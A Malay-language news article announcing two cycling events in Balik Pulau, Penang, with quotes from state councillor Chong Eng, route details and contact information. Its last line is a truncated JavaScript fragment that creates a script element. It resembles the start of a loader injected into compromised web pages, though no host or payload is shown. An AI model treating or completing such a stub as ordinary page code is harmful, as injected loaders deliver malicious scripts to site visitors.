Berkayuh sambil hayati keindahan Balik Pulau

Oleh: WATAWA NATAF ZULKIFLI

Gambar : DANNY OOI

BALIK PULAU – Exco Belia & Sukan, Pembangunan Wanita Keluarga dan Komuniti, Chong Eng mempelawa orang ramai menyertai dua acara berbasikal di sini iaitu Balik Pulau Explorer dan Monster Climb Challenge yang masing-masing bakal berlangsung pada 2 serta 3 Mei ini.

Menurutnya, acara anjuran pertubuhan bukan kerajaan (NGO), Cleaner & Greener Sports dan Persatuan Berbasikal Pulau Pinang tersebut adalah sejajar dengan visi Kerajaan Negeri untuk menjadikan Pulau Pinang sebuah bandaraya sukan antarabangsa.

“Saya selalu mengalu-alukan pihak pengelola program sukan untuk menganjurkan program sukan di pelbagai lokasi di Pulau Pinang terutamanya di kawasan seperti Seberang Perai dan Balik Pulau.

“Justeru, cadangan penganjuran kedua-dua program ini adalah selaras dengan seruan tersebut yang amat ia amat sesuai disertai seisi keluarga bagi menghayati keindahan semulajadi serta memerhatikan gaya hidup tradisional di Balik Pulau,’’ katanya pada sidang media pengumuman penganjuran acara berkaitan di sini baru-baru ini.

Balik Pulau Explorer bakal berlangsung pada 2 Mei ini bermula jam 5 petang hingga 9 malam di Kompleks Sukan Balik Pulau, manakala, Monster Climb, 3 Mei ini bermula 7 pagi dari Kompleks Sukan Balik Pulau melalui Teluk Kumbar, Bayan Lepas, Sungai Ara, Bukit Jambul, Jalan Tun Sardon sebelum kembali semula ke Kompleks Sukan Balik Pulau membabitkan keseluruhan perjalanan sejauh 42 kilometer.

Menurut Chong Eng, beliau berharap melalui penganjuran programprogram terbabit, orang ramai dapat menghargai keindahan alam semulajadi Balik Pulau.

“Kita akan lebih cinta kepada alam sekitar dan sebagai warga yang bertanggungjawab, kita perlu mendidik anak anak muda untuk sayangkan alam sekitar,” ujar beliau.

Bagi makluman lanjut, layari penangevents.com.my atau hubungi talian, 011 – 1187 6238.

var d=document;var s=d.createElement(‘script’);